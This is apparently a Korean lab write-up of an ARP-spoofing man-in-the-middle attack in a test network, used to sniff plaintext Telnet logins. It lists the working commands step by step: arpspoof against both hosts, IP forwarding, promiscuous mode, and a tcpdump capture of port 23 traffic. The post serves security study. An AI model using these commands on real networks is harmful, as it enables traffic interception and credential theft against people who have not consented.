본문 바로가기
Infra & Security Eng/Network & Security

ARP 스푸핑을 이용한 Telnet 평문 패킷 스니핑 및 계정 탈취 분석

by 엔지니어 E 2026. 3. 11.
반응형

실습 네트워크 구성
Windows XP (Client): 192.168.11.7 (Telnet 접속 시도자)
Telnet Server: 192.168.11.17 (서비스 제공자, 계정 생성 대상)
Kali Linux (Attacker): 192.168.11.36 (패킷 스니핑 수행)

실습 목적 
** ARP 스푸핑(ARP Spoofing)**을 이용해 중간자 공격(MITM)을 수행하고, 암호화되지 않은 Telnet 평문 패킷을 스니핑하여 계정 정보를 탈취하는 과정을 다룬다

 

사전 작업


네트워크 인터페이스 카드(NIC)를 프러미스큐어스(Promiscuous) 모드로 설정하여, 목적지 주소가 본인이 아닌 패킷까지 모두 수신할 수 있도록 활성화함

# ip ad show eth0 으로 먼저 사전 확인 

# ip link set dev eth0 promisc on 으로 프러미스큐어스 모드 활성화하기

 

텔넷 서버(192.168.11.17) 
1. 서비스 설치 및 시작, 계정 생성하기 
# dnf install -y telnet-server telnet
# systemctl enable --now telnet.socket

# useradd st15
# passwd st15 

* systemctl stop firewalld - 방화벽 해제 하기 

2. 공격자 서버(192.168.11.36) 

1) 터미널1 (패킷 포워딩) 


# sysctl -w net.ipv4.ip_forward=1

2. 터미널 2(ARP Spoofing) - XP(7번)를 속여 패킷이 공격자 서버로 오게 만든다 

# arpspoof -i eth0 -t 192.168.11.7 192.168.11.17

3. 터미널 3 - 서버(17번)를 속여 응답 패킷이 공격자 서버로 오게 만든다
# arpspoof -i eth0 -t 192.168.11.17 192.168.11.7

4. 터미널 4(패킷 스니핑) - 데이터를 파일에 기록
# tcpdump -xX -i eth0 tcp port 23 and host 192.168.11.17 > 11.17 - 데이터를 갈취하여 11.17 이라는 파일에 넣는 명령어

5. 윈도우xp 명령 프롬프트에서 로그인

아이디: st15 / 비밀번호 st15 

6. 저장된 파일 확인하기 

# cat 11.17 명령어로 파일 확인